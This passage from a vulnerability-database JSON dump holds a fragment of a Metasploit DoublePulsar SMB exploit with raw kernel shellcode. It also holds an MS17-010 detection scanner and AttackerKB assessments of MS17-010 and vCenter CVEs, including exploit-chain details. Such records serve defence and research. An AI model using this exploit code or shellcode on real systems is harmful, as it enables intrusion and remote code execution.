pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 
\npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack('S<') \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\ \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\ \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\ \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" 
+ \ngenerate_process_hash(proc_name.upcase) + 
\n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\ \n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156196/smb_doublepulsar_rce.rb.txt"}, {"lastseen": "2017-04-18T01:24:55", "description": "", "cvss3": {}, "published": "2017-04-17T00:00:00", "type": "packetstorm", "title": "Microsoft Windows MS17-010 SMB Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "modified": "2017-04-17T00:00:00", "id": "PACKETSTORM:142181", "href": "https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# auxiliary/scanner/smb/smb_ms_17_010 \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Auxiliary \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Exploit::Remote::SMB::Client::Authenticated \n \ninclude Msf::Auxiliary::Scanner \ninclude Msf::Auxiliary::Report \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 SMB RCE Detection', \n'Description' => %q{ \nUses information disclosure to determine if MS17-010 has been patched or not. \nSpecifically, it connects to the IPC$ tree and attempts a transaction on FID 0. \nIf the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does \nnot have the MS17-010 patch. \n \nThis module does not require valid SMB credentials in default server \nconfigurations. It can log on as the user \"\\\" and connect to IPC$. 
\n}, \n'Author' => [ 'Sean Dillon <sean.dillon@risksense.com>' ], \n'References' => \n[ \n[ 'CVE', '2017-0143'], \n[ 'CVE', '2017-0144'], \n[ 'CVE', '2017-0145'], \n[ 'CVE', '2017-0146'], \n[ 'CVE', '2017-0147'], \n[ 'CVE', '2017-0148'], \n[ 'MSB', 'MS17-010'], \n[ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] \n], \n'License' => MSF_LICENSE \n)) \nend \n \ndef run_host(ip) \nbegin \nstatus = do_smb_probe(ip) \n \nif status == \"STATUS_INSUFF_SERVER_RESOURCES\" \nprint_warning(\"Host is likely VULNERABLE to MS17-010!\") \nreport_vuln( \nhost: ip, \nname: self.name, \nrefs: self.references, \ninfo: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' \n) \nelsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\" \n# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) \nprint_good(\"Host does NOT appear vulnerable.\") \nelse \nprint_bad(\"Unable to properly detect if host is vulnerable.\") \nend \n \nrescue ::Interrupt \nprint_status(\"Exiting on interrupt.\") \nraise $! 
\nrescue ::Rex::Proto::SMB::Exceptions::LoginError \nprint_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\") \nrescue ::Exception => e \nvprint_error(\"#{e.class}: #{e.message}\") \nensure \ndisconnect \nend \nend \n \ndef do_smb_probe(ip) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nipc_share = \"\\\\\\\\#{ip}\\\\IPC$\" \nsimple.connect(ipc_share) \ntree_id = simple.shares[ipc_share] \n \nprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\") \n \n# request transaction with fid = 0 \npkt = make_smb_trans_ms17_010(tree_id) \nsock.put(pkt) \nbytes = sock.get_once \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \n# convert error code to string \ncode = pkt['SMB'].v['ErrorClass'] \nsmberr = Rex::Proto::SMB::Exceptions::ErrorCode.new \nstatus = smberr.get_error(code) \n \nprint_status(\"Received #{status} with FID = 0\") \nstatus \nend \n \ndef make_smb_trans_ms17_010(tree_id) \n# make a raw transaction packet \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \n# opcode 0x23 = PeekNamedPipe, fid = 0 \nsetup = \"\\x23\\x00\\x00\\x00\" \nsetup_count = 2 # 2 words \ntrans = \"\\\\PIPE\\\\\\x00\" \n \n# calculate offsets to the SetupData payload \nbase_offset = pkt.to_s.length + (setup.length) - 4 \nparam_offset = base_offset + trans.length \ndata_offset = param_offset # + 0 \n \n# packet baselines \npkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode \npkt['Payload']['SMB'].v['TreeID'] = tree_id \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload'].v['ParamCountMax'] = 0xffff 
\npkt['Payload'].v['DataCountMax'] = 0xffff \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataOffset'] = data_offset \n \n# actual magic: PeekNamedPipe FID=0, \\PIPE\\ \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup \npkt['Payload'].v['Payload'] = trans \n \npkt.to_s \nend \nend \n \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142181/mswinsmb-exec.rb.txt"}], "attackerkb": [{"lastseen": "2022-11-29T17:13:58", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. 
As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. 
As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T20:15:23", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security 
patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0143", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-27T11:14:06", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.\n\n \n**Recent assessments:** \n \nAssessed 
Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0148", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "href": "https://attackerkb.com/topics/N7nzZYYXHW/cve-2017-0148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-15T02:13:11", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 
\nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0146", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "href": "https://attackerkb.com/topics/DPN51hmEne/cve-2017-0146", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-20T02:15:27", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**NewlineDotBlog** at January 27, 2021 9:26am 
UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-0144 (MS17-010)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "modified": "2020-07-30T00:00:00", "id": "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "href": "https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-01T07:02:45", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). 
Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-19T11:06:39", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health 
Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 28, 2021 10:35pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\n**ccondon-r7** at May 26, 2021 5:41pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. 
Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n\nNote that `methodInput` is still ~~limited~~ somewhat limited by what `ProxygenSerializer` can deserialize, so the JNDI injection via [static method](<https://docs.oracle.com/javase/tutorial/jndi/ops/lookup.html>) is good for arbitrary method invocation, callback notwithstanding. Jang ([**@testanull**](<https://twitter.com/testanull>)) [points out](<https://twitter.com/testanull/status/1400724415411748865>) that `TypeConverter` can be leveraged to work around this issue. Jang\u2019s writeup is [here](<https://testbnull.medium.com/a-quick-look-at-cve-2021-21985-vcenter-pre-auth-rce-9ecd459150a5>).\n\n**Update:** A ~~new RCE chain~~ [writeup](<http://noahblog.360.cn/vcenter-cve-2021-2021-21985/>) involving SSRF has been published [by the original researcher].\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-21985", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 